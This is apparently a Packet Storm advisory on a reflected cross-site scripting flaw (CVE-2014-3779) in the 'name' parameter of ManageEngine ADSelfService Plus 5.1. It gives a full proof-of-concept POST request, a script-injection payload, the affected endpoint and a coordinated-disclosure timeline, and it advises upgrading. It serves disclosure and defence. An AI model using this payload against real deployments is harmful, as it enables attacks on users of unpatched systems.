ADSelfservice Plus 5.1 Cross Site Scripting

2015-01-03T00:00:00
ID PACKETSTORM:129803
Type packetstorm
Reporter Blessen Thomas
Modified 2015-01-03T00:00:00

Description

                                        
                                            `  
Security Advisory :   
Exploit Title:   
Manageengine ADSelfservice Plus Reflected Cross Site Scripting (XSS)  
Google dork : N/A  
Exploit Author: Blessen Thomas  
Date : 03-01-2015  
Vendor Homepage :   
Software Link : N/A  
  
Version :  
  
ADSelfservice Plus version 5.1 Build :5102 , Evaluation version –Trial  
  
Tested on :  
  
Windows XP SP2 -Host machine ,Windows server 2003 as Active directory  
  
CVE-2014-3779  
  
Type of Application : Web application  
  
Release mode : Coordinated disclosure  
  
Vulnerability Description :   
It is observed that the Manageengine ADSelfservice Plus is vulnerable to reflected cross site scripting(non-persistent/temporary) cross site scripting attacks in the “name” parameter and  
the unfiltered input is reflected to the user   
  
  
Proof of concept :  
  
Request :  
  
POST /GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription HTTP/1.1  
Host: 192.168.163.134:8888  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription  
Cookie: JSESSIONIDADSSP=A4144A81CF9702C53035062DBA9CD0F3; JSESSIONIDSSO=D8EE830B96B0218E4548BA3B8ADD09DB; adsspcsrf=79cf454e-9b3f-462b-bb12-03b70cd2f469  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 161  
  
subID=0&name=test"";</script><script>alert(0)</script><"&desc=test&domains=test.com&domainName=test.com&hidden_grps=%7B%22group%22%3A%7B%22%7B1CE0BEAF-207E-4C48-B893-8A3B0FB49CFF%7D%22%3A%22Account+Operators%22%7D%7D&hidden_usrs=%7B%22user%22%3A%7B%22%7BC4520992-9D3F-439D-82F7-0869AF3BF267%7D%22Administrator%22%7D%7D&viewMembers=on  
  
  
Parameter affected:  
  
name  
  
Payload (Exploit Code):  
  
"";</script><script>alert(0)</script><"  
  
Vulnerable link:   
  
192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription   
  
  
  
Tools used :  
  
Mozilla firefox browser v28.0 , Burp proxy free edition v1.5  
  
  
## Workaround ##  
----------------  
Update to newer Version 5.2 Build 5202   
http://www.manageengine.com/products/self-service-password/download.html?btmMenu   
  
## TimeLine ##  
----------------------  
13th Apr 2014 : Bug Discovered  
15th Apr 2014 : vendor was notified by e-mail  
16th Apr 2014 : Vendor response received  
13th May 2014 : Vendor acknowledged and released a patch  
22nd May 2014 : Mitre Team provided CVE id  
03rd Jan 2015 : Public Disclosure  
  
  
  
`